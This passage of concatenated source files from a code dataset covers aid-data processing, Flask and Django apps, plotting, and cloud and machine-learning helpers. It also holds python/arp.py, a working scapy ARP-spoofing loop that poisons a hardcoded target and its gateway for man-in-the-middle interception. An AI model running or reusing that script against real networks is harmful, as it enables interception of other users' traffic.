activity level\n self.org = Lookups.get_org_info(dactivity.reporting_org, reporting_org=True)\n self.strict = self.is_strict()\n self.humanitarian = dactivity.humanitarian\n # Figure out default country or region/sector percentage splits at the activity level\n self.countryregion_splits = CalculateSplits.make_country_or_region_splits(dactivity)\n self.sector_splits = CalculateSplits.make_sector_splits(dactivity)\n self.transactions = list()\n\n def add_transactions(self, configuration):\n skipped = 0\n for dtransaction in self.dactivity.transactions:\n transaction = Transaction.get_transaction(configuration, dtransaction)\n if not transaction:\n skipped += 1\n continue\n self.transactions.append(transaction)\n return skipped\n\n @staticmethod\n def get_activity(configuration, dactivity):\n \"\"\"\n We exclude activities from secondary reporters and certain sorts\n of organisations where the data is very poor quality. We also\n exclude hierarchy=1 activities for UNDP (XM-DAC-41114) and FCDO (GB-GOV-1).\n \"\"\"\n # Skip activities from a secondary reporter\n if dactivity.secondary_reporter:\n return None, len(dactivity.transactions)\n reporting_org_ref = dactivity.reporting_org.ref\n # Filter out certain orgs\n if Lookups.is_filter_reporting_orgs(reporting_org_ref):\n return None, len(dactivity.transactions)\n # Filter out eg. UNDP and DFID activities that have children (i.e. filter out h=1)\n if Lookups.is_filter_reporting_orgs_children(reporting_org_ref):\n if '2' in dactivity.related_activities_by_type:\n return None, len(dactivity.transactions)\n activity = Activity(dactivity)\n skipped = activity.add_transactions(configuration)\n return activity, skipped\n\n def is_strict(self):\n return True if (Lookups.checks.has_desired_scope(self.dactivity.humanitarian_scopes) or Lookups.checks.has_desired_tag(self.dactivity.tags) or\n Lookups.checks.has_desired_sector(self.dactivity.sectors) or Lookups.checks.is_desired_narrative(self.dactivity.title.narratives)) \\\n else False\n\n def sum_transactions_by_type(self):\n totals = dict()\n for transaction in self.transactions:\n key = f'{transaction.get_direction()} {transaction.get_classification()}'\n totals[key] = totals.get(key, 0) + transaction.value\n return totals\n\n def factor_new_money(self):\n #\n # Figure out how to factor new money\n #\n\n # Total up the 4 kinds of transactions (with currency conversion to USD)\n totals = self.sum_transactions_by_type()\n\n # Figure out total incoming money (never less than zero)\n incoming = max(totals.get('incoming commitments', 0), totals.get('incoming spending', 0))\n if incoming < 0:\n incoming = 0\n\n # Factor to apply to outgoing commitments for net new money\n if incoming == 0:\n self.commitment_factor = 1.0\n else:\n outgoing_commitments = totals.get('outgoing commitments', 0)\n if outgoing_commitments > incoming:\n self.commitment_factor = (outgoing_commitments - incoming) / outgoing_commitments\n else:\n self.commitment_factor = 0.0\n\n # Factor to apply to outgoing spending for net new money\n if incoming == 0:\n self.spending_factor = 1.0\n else:\n spending = totals.get('outgoing spending', 0)\n if spending > incoming:\n self.spending_factor = (spending - incoming) / spending\n else:\n self.spending_factor = 0.0\n\n def add_to_flows(self, out_flows, transaction, funder, implementer):\n if transaction.get_classification() != 'spending':\n return\n provider, receiver = transaction.get_provider_receiver()\n if funder and provider['name'] == Lookups.default_org_name:\n provider = funder\n if 
implementer and receiver['name'] == Lookups.default_org_name:\n receiver = implementer\n org_name = self.org['name']\n if org_name != Lookups.default_org_name and org_name != provider['name'] and org_name != receiver['name']:\n provider_name = provider['name']\n if (not provider_name or provider_name == Lookups.default_org_name) and provider['id']:\n provider_name = provider['id']\n receiver_name = receiver['name']\n if (not receiver_name or receiver_name == Lookups.default_org_name) and receiver['id']:\n receiver_name = receiver['id']\n key = self.org['name'], provider_name, receiver_name,\\\n transaction.is_humanitarian, transaction.is_strict, transaction.get_direction()\n # ignore internal transactions or unknown reporting orgs\n cur_output = out_flows.get(key, dict())\n cur_output['value'] = cur_output.get('value', 0) + transaction.value\n if 'row' not in cur_output:\n cur_output['row'] = [self.org['id'], self.org['name'], self.org['type'], provider['id'],\n provider_name, provider['type'], receiver['id'], receiver_name,\n receiver['type'], transaction.is_humanitarian, transaction.is_strict,\n transaction.get_direction()]\n out_flows[key] = cur_output\n\n def generate_split_transactions(self, out_transactions, transaction):\n # Make the splits for the transaction (default to activity splits)\n country_splits = transaction.make_country_or_region_splits(self.countryregion_splits)\n sector_splits = transaction.make_sector_splits(self.sector_splits)\n\n # Apply the country and sector percentage splits to the transaction\n # generate multiple split transactions\n for country, country_percentage in country_splits.items():\n for sector, sector_percentage in sector_splits.items():\n\n sector_name = Lookups.get_sector_group_name(sector)\n country_name = Lookups.get_country_region_name(country)\n\n #\n # Add to transactions\n #\n\n total_money = int(round(transaction.value * country_percentage * sector_percentage))\n net_money = int(round(transaction.net_value * country_percentage * sector_percentage))\n\n if total_money != 0:\n # add to transactions\n out_transactions.append([transaction.year_month, self.org['id'], self.org['name'], self.org['type'],\n sector_name, country_name, transaction.is_humanitarian,\n transaction.is_strict, transaction.get_classification(), self.identifier,\n net_money, total_money])\n\n def get_funder_implementer(self):\n funder = None\n implementer = None\n participating_orgs_by_role = self.dactivity.participating_orgs_by_role\n for role in participating_orgs_by_role:\n if role not in ('1', '4'):\n continue\n participating_orgs = participating_orgs_by_role[role]\n if len(participating_orgs) != 1:\n continue\n org = Lookups.get_org_info(participating_orgs[0])\n if role == '1':\n funder = org\n else:\n implementer = org\n return funder, implementer\n\n def process(self, today_year_month, out_flows, out_transactions):\n self.factor_new_money()\n #\n # Walk through the activity's transactions one-by-one, and split by country/sector\n #\n funder, implementer = self.get_funder_implementer()\n skipped = 0\n for transaction in self.transactions:\n if not transaction.process(today_year_month, self):\n skipped += 1\n continue\n self.add_to_flows(out_flows, transaction, funder, implementer)\n if transaction.net_value is None:\n skipped += 1\n continue\n self.generate_split_transactions(out_transactions, transaction)\n return 
skipped","sub_path":"iati/activity.py","file_name":"activity.py","file_ext":"py","file_size_in_byte":8866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"67028034","text":"import os\n\nimport werkzeug\nfrom flask import render_template, Flask, abort\nfrom flask_demo.views import blueprint_demo\nfrom logging.config import dictConfig\n\n# 配置日志\nfrom flask_demo.views.class_view_demo import ClassViewAPI\n\nBASE_DIR = os.path.dirname(os.path.abspath(__file__))\nprint(BASE_DIR)\nlog_dir = os.path.join(BASE_DIR, 'logs/debug.log')\nprint(log_dir)\ndictConfig({\n 'version': 1,\n 'formatters': {'default': {\n 'format': '[%(asctime)s] %(levelname)s in %(module)s: %(message)s',\n }},\n 'handlers': {\n # 'wsgi': {\n # 'class': 'logging.StreamHandler',\n # 'stream': 'ext://flask.logging.wsgi_errors_stream',\n # 'formatter': 'default'\n # },\n 'file': {\n 'level': 'DEBUG',\n 'class': 'logging.FileHandler',\n 'filename': log_dir,\n 'formatter': 'default',\n },\n },\n 'root': {\n 'level': 'INFO',\n 'handlers': ['file']\n }\n})\n\n# 声明Flask对象\napp = Flask(__name__)\napp.register_blueprint(blueprint_demo.bp)\n\n\n# 基本函数视图\n@app.route('/hello/')\n@app.route('/hello/')\ndef hello(name=None):\n return render_template('template_demo.html', name=name)\n\n\n# 错误处理\n@app.errorhandler(404)\ndef handle_bad_request(e):\n return '404 Not Found!'\n\n\n# 模型渲染 信号监听\ndef log_template_renders(sender, template, context, **extra):\n print('test')\n sender.logger.debug('Rendering template \"%s\" with context %s',\n template.name or 'string template',\n context)\n\n\nfrom flask import template_rendered\n\ntemplate_rendered.connect(log_template_renders, app)\n\n\ndef user_required(f):\n \"\"\"Checks whether user is logged in or raises error 401.\"\"\"\n\n def decorator(*args, **kwargs):\n if not g.user:\n abort(401)\n return f(*args, **kwargs)\n\n return decorator\n\n\n# 可插拔视图\napp.add_url_rule('/class_view/', view_func=ClassViewAPI.as_view('users'))\n# 装饰视图,可移到类中\n# view = user_required(ClassViewAPI.as_view('users'))\n# app.add_url_rule('/users/', view_func=view)","sub_path":"flask_demo/template_demo.py","file_name":"template_demo.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"354127687","text":"#!/usr/bin/python3.6\n\"\"\"\nData Visualization module.\nPlot Data based on Temprature max, humidity,\n\"\"\"\n\n\nimport matplotlib.pyplot as plt\nimport csv\nimport numpy as np\nimport pandas as pd\n\n\ndef format_date(date):\n y = date[0:4]\n m = date[4:6]\n d = date[6:8]\n return \"{}/{}/{}\".format(d, m, y)\n\n\ndef plotData():\n data = './data.csv'\n df = pd.read_csv(data)\n y_val = np.array(df[' _tempm'])\n\n dates = np.array(df['datetime_utc'])\n x_val = [ format_date(d) for d in dates ]\n\n n = len(x_val)\n start_index = n % 100000\n print(start_index)\n print(n)\n tmp = {}\n for i in range(start_index, n):\n #print(x_val[i], y_val[i])\n tmp[y_val[i]] = x_val[i]\n\n # Plotting data\n plt.figure(figsize = (12, 7))\n plt.plot(x_val, y_val, color = '#ff3f0f')\n plt.xticks(rotation='vertical')\n plt.show()\n\n\nplotData()\n\n","sub_path":"Delhi-Weather-Prediction/data_visualize.py","file_name":"data_visualize.py","file_ext":"py","file_size_in_byte":864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360002612","text":"\"\"\"\nSlingshot Workflow Object.\n\"\"\"\n\nfrom slingshot.core.events import WorkflowEvents\nfrom 
slingshot.core.step import Step\nfrom slingshot.core.step import StepGroup\nfrom uuid import uuid4\n\n\nclass Workflow(object):\n    \"\"\"A Workflow is a sequence consisting of a number of Steps.\n\n    For use, create an instance of Step, then add step instance.\n    When all the steps have been added, the workflow can be passed to a runner,\n    such as LocalWorkflowRunner. It will run individual step in order in which\n    they have been added, aggregating the results.\n    \"\"\"\n\n    def __init__(self, uuid=None, steps=(), events=None):\n        self._steps = []\n        self.add_steps(steps)\n        self._history = []\n        self.uuid = uuid or uuid4().hex\n        self._events = events if events is not None else WorkflowEvents()\n\n    def get_events(self):\n        return self._events\n\n    def add_step(self, step):\n        \"\"\"Add step instance to the workflow\"\"\"\n        if isinstance(step, dict):\n            if step.get('type') == 'group':\n                step = StepGroup(**step)\n            else:\n                step = Step(**step)\n        elif not isinstance(step, (Step, StepGroup)):\n            raise TypeError(\n                \"Step must be instantiated before passing them to add_step()\")\n        self._steps.append(step)\n\n    def add_steps(self, steps):\n        \"\"\"Add step instances to the workflow\"\"\"\n        for step in steps:\n            self.add_step(step)\n\n    def as_dict(self):\n        \"\"\"Dictionary representation of the workflow\"\"\"\n        return {\n            'uuid': self.uuid,\n            'steps': list(s.as_dict() for s in self._steps)\n        }\n\n    def get_max_timeout(self, steps=None):\n        if steps is None:\n            steps = self._steps\n        duration = 0\n        for step in steps:\n            if type(step) is StepGroup:\n                if step.do:\n                    duration += self.get_max_timeout(step.do)\n                if step.rollback:\n                    duration += self.get_max_timeout(step.rollback)\n            else:\n                # Add a tiny amount of wiggle room of 10 seconds\n                # to allow time for tasks to be sent from SWF\n                duration += step.timeout * step.max_retry + 10\n        return duration\n\n    def __eq__(self, other):\n        return self.as_dict() == other.as_dict()\n\n    def __iter__(self):\n        return iter(self._steps)\n","sub_path":"slingshot/core/workflow.py","file_name":"workflow.py","file_ext":"py","file_size_in_byte":2410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"75635242","text":"import scapy.all as scapy\nimport time\n\ndef get_mac(ip):\n    arp_request = scapy.ARP(pdst = ip)\n    broadcast = scapy.Ether(dst =\"ff:ff:ff:ff:ff:ff\") \n    arp_request_broadcast = broadcast / arp_request\n    answered_list = scapy.srp(arp_request_broadcast, timeout = 5, verbose = False)[0] \n    return answered_list[0][1].hwsrc\n\ndef spoof(target_ip, spoof_ip):\n    packet = scapy.ARP(op = 2, pdst = target_ip, hwdst = get_mac(target_ip),psrc = spoof_ip)\n    scapy.send(packet, verbose = False)\n\ndef restore(destination_ip, source_ip):\n    destination_mac = get_mac(destination_ip)\n    source_mac = get_mac(source_ip)\n    packet = scapy.ARP(op = 2, pdst = destination_ip, hwdst = destination_mac, psrc = source_ip, hwsrc = source_mac) \n    scapy.send(packet, verbose = False)\n\ntarget_ip = \"10.10.202.196\" # target's wireless LAN IPv4 address\ngateway_ip = \"10.10.202.254\" # my wireless LAN default gateway\n\ntry:\n    sent_packets_count = 0\n    while True:\n        spoof(target_ip, gateway_ip) \n        spoof(gateway_ip, target_ip)\n        sent_packets_count = sent_packets_count + 2\n        print(\"\\r[*] Packets Sent \"+str(sent_packets_count), end =\"\") \n        time.sleep(2) # Waits for two seconds\n\nexcept KeyboardInterrupt:\n    print(\"\\nCtrl + C pressed.............Exiting\")\n    restore(gateway_ip, target_ip) \n    restore(target_ip, gateway_ip)\n    print(\"[+] Arp Spoof 
Stopped\")\n\n\n\n","sub_path":"python/arp.py","file_name":"arp.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"373381829","text":"import boto3\nimport time\nimport paramiko\nfrom class_getRequest import cvsAPI\n\ncvs = cvsAPI()\ncvs.get_fileSystems()\ncvs.get_fileSystemsdetails()\ncvs.create_fileSystems()\n#update_fileSystems()\n#delete_filesystems()\n#cvs.create_snapshot()\ncvs.target_information()\nmnt = cvs.buildMountnameforCFT()\n#print(mnt)\n\ncft = boto3.client('cloudformation')\n\nclass cftStack(object):\n\n # create stack\n\n def createStack(self):\n stackname = \"prabuTest46\"\n with open('//users/arjunan/Documents/EC2instnaceSample.json', 'r') as f:\n create_cft = cft.create_stack(StackName=stackname, TemplateBody=f.read())\n print(\"Create Stack o/p - \", create_cft)\n\n # wait time for the Stack creation\n\n time.sleep(120)\n\n # list the stack created\n\n list_stack_resp = cft.list_stack_resources(StackName=stackname)\n if list_stack_resp['StackResourceSummaries'][0] != 0:\n instanceID = list_stack_resp['StackResourceSummaries'][0]['PhysicalResourceId']\n self.instanceID = instanceID\n print(\"Instance ID of the newly created instance : \", instanceID)\n else:\n print(\"Stack Creation failed\")\n\n #get the public DNS of the Intance created\n\n def intanceDetails(self):\n requiredInstance = self.instanceID\n #print(requiredInstance)\n ec2client = boto3.client('ec2')\n response = ec2client.describe_instances()\n for reservation in response[\"Reservations\"]:\n for instance in reservation[\"Instances\"]:\n # This sample print will output entire Dictionary object\n #print(instance)\n # This will print will output the value of the Dictionary key 'InstanceId'\n #print(instance[\"InstanceId\"])\n if (instance[\"InstanceId\"]) == requiredInstance:\n response = ec2client.describe_instances(\n Filters=[\n {\n 'Name': 'instance-id',\n 'Values': [requiredInstance]\n },\n ])\n publicipAddress = response['Reservations'][0]['Instances'][0]['PublicDnsName']\n self.publicipAddress = publicipAddress\n print(\"public ip address of the Instance creates is : \", publicipAddress)\n return\n else:\n print(\"Wait...\")\n\n\n\n def ssh_login(self):\n\n try:\n export = mnt\n sudo = \"sudo -s\"\n dirname = \"pythonscripttest12\"\n mkdir = \"sudo mkdir\" + \" \" + dirname\n dirpermissions = \"sudo chmod -R 755\" + \" \" + dirname\n mount = \"sudo mount -t nfs -o rw,hard,nointr,rsize=32768,wsize=32768,bg,nfsvers=3,tcp\" + \" \" + export + \" \" + dirname\n hostname1 = self.publicipAddress\n cert = paramiko.RSAKey.from_private_key_file(\"/Users/arjunan/Documents/prabu.pem\")\n c = paramiko.SSHClient()\n c.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n print (\"connecting to the newly created EC2 instance\")\n time.sleep(120)\n c.connect(hostname=hostname1, username=\"ec2-user\", pkey=cert)\n print(\"connected!!!\")\n stdin, stdout, stderr = c.exec_command(mkdir)\n stdin1, stdout1, stderr1 = c.exec_command(dirpermissions)\n stdin2, stdout2, stderr2 = c.exec_command(mount)\n #print(stdout.readlines(\"Directory creation successful\"))\n stdout.readlines()\n stdout1.readlines()\n stdout2.readlines()\n print(\"Mount Volume success \")\n c.close()\n\n except:\n print(\"Connection Failed!!!\")\n\nstack = 
cftStack()\nstack.createStack()\nstack.intanceDetails()\nstack.ssh_login()\n\n","sub_path":"cloudformation.py","file_name":"cloudformation.py","file_ext":"py","file_size_in_byte":3854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"116035568","text":"\nmoves = 0\n\n\ndef solve(line, balls):\n global moves\n if(balls < moves):\n moves = balls\n i = 0\n while(i < len(line)-2):\n if(line[i] == 'o' and line[i+1] == 'o' and line[i+2] == '-'):\n mod = line[:i] + \"--o\"\n if(i < len(line)-3):\n mod = mod + line[i+3:]\n\n \n\n solve(mod, balls-1)\n if(line[i] == '-' and line[i+1] == 'o' and line[i+2] == 'o'):\n mod = line[:i] + \"o--\"\n if(i < len(line)-3):\n mod = mod + line[i+3:]\n \n\n solve(mod, balls-1)\n i+=1\n\n\ndef main():\n global moves\n n = int(input())\n\n while(n != 0):\n line = input()\n moves = line.count('o')\n solve(line, moves)\n print(moves)\n n-=1\n\nmain()","sub_path":"10651.py","file_name":"10651.py","file_ext":"py","file_size_in_byte":792,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"229809491","text":"# draw two circles, the smaller one is inside the bigger one\n# using python matplotlib library\n\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n# create a figure window\nfig = plt.figure(figsize=(6,6))\n\n# get the current axes, creating one if necessary.\nax = fig.gca()\n\n# set x and y limits of the current axes\nax.set_xlim([0,10])\nax.set_ylim([0,10])\n\n# draw a circle\ncircle1 = plt.Circle((5,5), 2, color='r', fill=False)\nax.add_artist(circle1)\n\n# draw a smaller circle\ncircle2 = plt.Circle((5,5), 1, color='b', fill=False)\nax.add_artist(circle2)\n\n# save the figure\nfig.savefig('circle.png')","sub_path":"circles.py","file_name":"circles.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"370309816","text":"import time\nimport pickle\nimport threading\nfrom datetime import datetime, timedelta\nimport pandas as pd\nimport requests\nfrom pymongo import MongoClient\n\n\nclass Simulation:\n def __init__(self, dba, constants):\n self.dba = dba\n self.constants = constants\n self.threads = []\n\n # Init. 
info for the secondary DB that holds the weather forecasts\n        self.weather_DB = 'weatherDB'\n        self.weatherDB_COL = 'historicalCOL'\n        self.sim_time = None\n\n        # Name of the model stored locally by the modelling service\n        self.filename = 'model.pkl'\n\n# Predict whether starting the pump is viable\n    def predictBootConditions(self, curr_time, sch_time, curr_temp, curr_water_temp, predicted_temp, sch_consig_temp):\n        headers = ['Temperatura aigua impuls', 'Temperatura consigna', 'Temperatura exterior (AEMET)', 'Temperatura exterior (esperada)']\n\n        # Load the model generated by the modelling service\n        autoBootModel = pickle.load(open(self.filename, 'rb'))\n\n        # Predict from the model\n        if autoBootModel:\n            temp_impuls = (float(curr_water_temp.replace(',', \".\")))\n            temp_consigna = sch_consig_temp\n            temp_exterior = (float(curr_temp.replace(',', \".\")))\n            temp_exterior_pred = (float(predicted_temp.replace(',', \".\")))\n\n            x = dict(zip(headers, [[temp_impuls], [temp_consigna], [temp_exterior], [temp_exterior_pred]]))\n            x = pd.DataFrame.from_dict(x)\n            y = autoBootModel.predict(x)[0]\n\n            # Check the start-up conditions\n            sch_time_obj = datetime.strptime(sch_time + \":00+0100\", '%Y-%m-%dT%H:%M:%S%z')\n            curr_time_obj = datetime.strptime(curr_time, '%Y-%m-%dT%H:%M:%S%z')\n\n            time_diff = self.datetimeDiffInMinutes(curr_time_obj, sch_time_obj)\n            est_time_proj = self.datetimeDiffInMinutes(curr_time_obj, sch_time_obj - timedelta(minutes=y))\n\n            print(\"Estimated time until start-up: \" + str(est_time_proj))\n\n            # The pump starts if the predicted time to reach the setpoint temperature is greater than\n            # the difference between the current time and the scheduled time\n            if y >= time_diff:\n                return 1\n\n            # The pump will also start once the scheduled time has passed\n            if curr_time_obj > sch_time_obj:\n                return 1\n\n        return 0\n\n# Run the start-up prediction method in the background\n    def startNewSimulation(self, data, consigTemp):\n        t = threading.Thread(target=self.predictBoot, args=(data, consigTemp))\n        t.start()\n        return 1\n\n# Main start-up prediction method\n    def predictBoot(self, data, consigTemp):\n        start = 0\n        while start == 0:\n            values = self.dba.getLastSensorValues()\n            values = self.formatDataToString(values)\n\n            # Define the parameters needed to predict the start-up\n            curr_temp = values['Temperatura exterior (AEMET)'].replace(',', \".\")  # current outdoor temperature\n            curr_water_temp = values['Temperatura aigua impuls']  # current tank outlet water temperature\n            curr_time = values['Datetime']  # event date/time (in 15-minute intervals)\n            sch_time = data[\"params\"]  # scheduled time at which the user enters the house\n            predicted_temp = self.getPredictedTemp(sch_time)  # temperature predicted for the scheduled entry time\n            sch_consig_temp = consigTemp  # tank outlet temperature to reach by the user's entry time\n\n            start = self.predictBootConditions(curr_time, sch_time, curr_temp, curr_water_temp, predicted_temp, sch_consig_temp)\n\n            # Re-check start-up viability at a fixed interval\n            if start == 0:\n                time.sleep(20)\n\n        self.confirmBoot()\n\n# Time difference between two datetime objects, in hours\n    def datetimeDiffInHours(self, curr_time_obj, sch_time_obj):\n        # Round the date/time to the nearest full hour\n        if curr_time_obj.minute >= 30:\n            curr_time_obj = curr_time_obj + timedelta(hours=1)\n        curr_time_obj = curr_time_obj.replace(minute=0, second=0)\n\n        
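# e.g. (hypothetical values) 10:40 -> 11:00 and 10:10 -> 10:00; the same\n        # nearest-hour rounding is applied to sch_time_obj just below\n        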
if sch_time_obj.minute >= 30:\n            sch_time_obj = sch_time_obj + timedelta(hours=1)\n        sch_time_obj = sch_time_obj.replace(minute=0, second=0)\n        \n        # Compute the difference in hours\n        diff = sch_time_obj - curr_time_obj \n        diff_seconds = diff.total_seconds() # time difference in seconds\n        return divmod(diff_seconds, 3600)[0] # time difference in hours\n\n# Time difference between two datetime objects, in minutes\n    def datetimeDiffInMinutes(self, curr_time_obj, sch_time_obj):\n        diff = sch_time_obj - curr_time_obj\n        diff_seconds = diff.total_seconds() # time difference in seconds\n        return divmod(diff_seconds, 60)[0] # time difference in minutes\n\n# Format a record's values as strings\n    def formatDataToString(self, data):\n        for value in data:\n            if(isinstance(data[value], str)==False):\n                data[value]=str(data[value])\n        return data\n\n# Predict the outdoor temperature for the scheduled entry time from a secondary DB that provides\n# weather information later in time than the simulation's current date.\n    def getPredictedTemp(self, sch_time):\n\n        # Initialize the connection to the secondary DB\n        host = 'localhost'\n        port = 27017\n        con = MongoClient(host, port)\n        db = con[self.weather_DB]\n        col = db[self.weatherDB_COL]\n\n        # Get the outdoor temperature for the scheduled entry date/time\n        sch_time= sch_time + \":00+0100\"\n        output = col.find_one({'Datetime': sch_time})\n        output = self.formatDataToString(output)\n        con.close()\n        return output['Temperatura exterior (AEMET)']\n\n# Confirm the start-up and notify the DT controller through the /boot route\n    def confirmBoot(self):\n        r = requests.get('http://127.0.0.1:5000//boot')\n        print(r.status_code)","sub_path":"Services/Simulation.py","file_name":"Simulation.py","file_ext":"py","file_size_in_byte":6235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
+{"seq_id":"551731464","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n    dependencies = [\n    ]\n\n    operations = [\n        migrations.CreateModel(\n            name='Cita',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('fecha_cita', models.DateField(verbose_name=b'Fecha de Cita')),\n                ('hora_cita', models.TimeField(verbose_name=b'Hora de Cita')),\n                ('pendiente', models.BooleanField(default=True)),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.CreateModel(\n            name='Paciente',\n            fields=[\n                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n                ('cedula', models.IntegerField(unique=True)),\n                ('nombre', models.CharField(max_length=200)),\n                ('apellidos', models.CharField(max_length=200)),\n                ('telefono', models.IntegerField()),\n                ('direccion', models.TextField()),\n                ('medicamento', models.CharField(max_length=200)),\n                ('enfermedad', models.CharField(max_length=200)),\n                ('alergia', models.BooleanField(default=False)),\n                ('observacion', models.TextField()),\n            ],\n            options={\n            },\n            bases=(models.Model,),\n        ),\n        migrations.AddField(\n            model_name='cita',\n            name='paciente',\n            field=models.ForeignKey(to='citas_pacientes.Paciente'),\n            preserve_default=True,\n        ),\n    ]\n","sub_path":"citas_pacientes/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
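# A minimal sketch, assuming Django 1.x, of the models that the
# citas_pacientes 0001_initial migration above would be generated from;
# field names and options come from the migration itself, while the module
# layout is an assumption.
from django.db import models


class Paciente(models.Model):
    cedula = models.IntegerField(unique=True)
    nombre = models.CharField(max_length=200)
    apellidos = models.CharField(max_length=200)
    telefono = models.IntegerField()
    direccion = models.TextField()
    medicamento = models.CharField(max_length=200)
    enfermedad = models.CharField(max_length=200)
    alergia = models.BooleanField(default=False)
    observacion = models.TextField()


class Cita(models.Model):
    paciente = models.ForeignKey('citas_pacientes.Paciente')
    fecha_cita = models.DateField(verbose_name=b'Fecha de Cita')
    hora_cita = models.TimeField(verbose_name=b'Hora de Cita')
    pendiente = models.BooleanField(default=True)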
+{"seq_id":"468367220","text":"import keras\nfrom keras.callbacks import Callback\nclass AdditionalValidationSets(Callback):\n def __init__(self, validation_sets, verbose=0, batch_size=1):\n \"\"\"\n :param validation_sets:\n a list of 3-tuples (validation_data, validation_targets, validation_set_name)\n or 4-tuples (validation_data, validation_targets, sample_weights, validation_set_name)\n :param verbose:\n verbosity mode, 1 or 0\n :param batch_size:\n batch size to be used when evaluating on the additional datasets\n \"\"\"\n super(AdditionalValidationSets, self).__init__()\n self.validation_sets = validation_sets\n for validation_set in self.validation_sets:\n if len(validation_set) not in [2, 3]:\n raise ValueError()\n self.epoch = []\n self.history = {}\n self.verbose = verbose\n self.batch_size = batch_size\n\n def on_train_begin(self, logs=None):\n self.epoch = []\n self.history = {}\n\n def on_epoch_end(self, epoch, logs=None):\n logs = logs or {}\n self.epoch.append(epoch)\n\n # record the same values as History() as well\n for k, v in logs.items():\n self.history.setdefault(k, []).append(v)\n\n # evaluate on the additional validation sets\n for validation_set in self.validation_sets:\n if len(validation_set) == 3:\n validation_data, validation_targets, validation_set_name = validation_set\n sample_weights = None\n elif len(validation_set) == 4:\n validation_data, validation_targets, sample_weights, validation_set_name = validation_set\n else:\n raise ValueError()\n\n results = self.model.evaluate(x=validation_data,\n y=validation_targets,\n verbose=self.verbose,\n sample_weight=sample_weights,\n batch_size=self.batch_size)\n\n for i, result in enumerate(results):\n if i == 0:\n valuename = validation_set_name + '_loss'\n else:\n if type(self.model.metrics[i-1]) is str:\n valuename = validation_set_name + '_' + self.model.metrics[i-1]\n else:\n valuename = validation_set_name + '_' + self.model.metrics[i-1].__name__\n if i == 2:\n print(' - ' + valuename + ': {:.4f}'.format(result), end='')\n self.history.setdefault(valuename, []).append(result)\n print()\n","sub_path":"training/AdditionalValidationSets.py","file_name":"AdditionalValidationSets.py","file_ext":"py","file_size_in_byte":2689,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"480868047","text":"import datetime\n\nfrom django.test import Client, TestCase\n\nfrom .utils import create_admin_account, make_request\n\n\nclass MealApiTest(TestCase):\n \"\"\"Test for Meal API\"\"\"\n\n def setUp(self):\n self.client = Client()\n create_admin_account()\n self.data = {\n 'name': 'BreakFast',\n 'start_time': datetime.time(8, 30, 0),\n 'end_time': datetime.time(10, 0, 0)\n }\n\n def create_meal(self, name, start_time, end_time):\n query = '''\n mutation {\n createMeal(input: {name: \"%s\", startTime: \"%s\", endTime: \"%s\"}){\n meal{\n id,\n originalId,\n name\n }\n }\n }\n ''' % (name, start_time, end_time)\n\n return make_request(self.client, query, method='POST')\n\n def retrieve_meal(self, id):\n query = 'query {meal(id: \"%s\" ) {name}}' % (id)\n\n return make_request(self.client, query)\n\n def test_creation_of_meal_object(self):\n response = self.create_meal(self.data['name'],\n self.data['start_time'],\n self.data['end_time'])\n created_meal = response['meal']\n expected = {\n 'meal': {\n 'id': created_meal['id'],\n 'originalId': created_meal['originalId'],\n 'name': self.data['name']\n }\n }\n\n self.assertEqual(expected, response)\n\n def 
test_retrieval_of_one_meal_object(self):\n        # Retrieve with valid id\n        expected = {\n            'meal': {\n                'name': self.data['name']\n            }\n        }\n        create_response = self.create_meal(self.data['name'],\n                                           self.data['start_time'],\n                                           self.data['end_time'])\n        response = self.retrieve_meal(create_response['meal']['id'])\n        self.assertEqual(expected, response)\n\n        # Retrieve with invalid id\n        self.assertEqual({'meal': None}, self.retrieve_meal(2))\n\n    def test_updating_of_meal_object(self):\n        create_response = self.create_meal(self.data['name'],\n                                           self.data['start_time'],\n                                           self.data['end_time'])\n        # Update with valid id\n        query = '''\n            mutation{\n              updateMeal(\n                input: {\n                  id: \"%s\",\n                  name: \"breakfast edited\"\n                }\n              )\n              {\n                meal{\n                  id,\n                  name\n                }\n              }\n            }\n        ''' % (create_response['meal']['id'])\n        expected = {\n            'meal': {\n                'id': create_response['meal']['id'],\n                'name': 'breakfast edited'\n            }\n        }\n        response = make_request(self.client, query, 'POST')\n        self.assertEqual(expected, response)\n\n        # Update with invalid id\n        query = '''\n            mutation{\n              updateMeal(\n                input: {\n                  id: \"%s\",\n                  name: \"breakfast edited\"\n                }\n              )\n              {\n                meal{\n                  id,\n                  name\n                }\n              }\n            }\n        ''' % (\"wrong-id\")\n        self.assertEqual({'meal': None}, make_request(self.client, query, 'POST'))\n\n    def test_deletion_of_meal_object(self):\n        # Delete with valid id\n        create_response = self.create_meal(self.data['name'],\n                                           self.data['start_time'],\n                                           self.data['end_time'])\n        query = '''\n            mutation{\n              deleteMeal(input: {id: \"%s\"}){\n                meal{\n                  name\n                }\n              }\n            }\n        ''' % 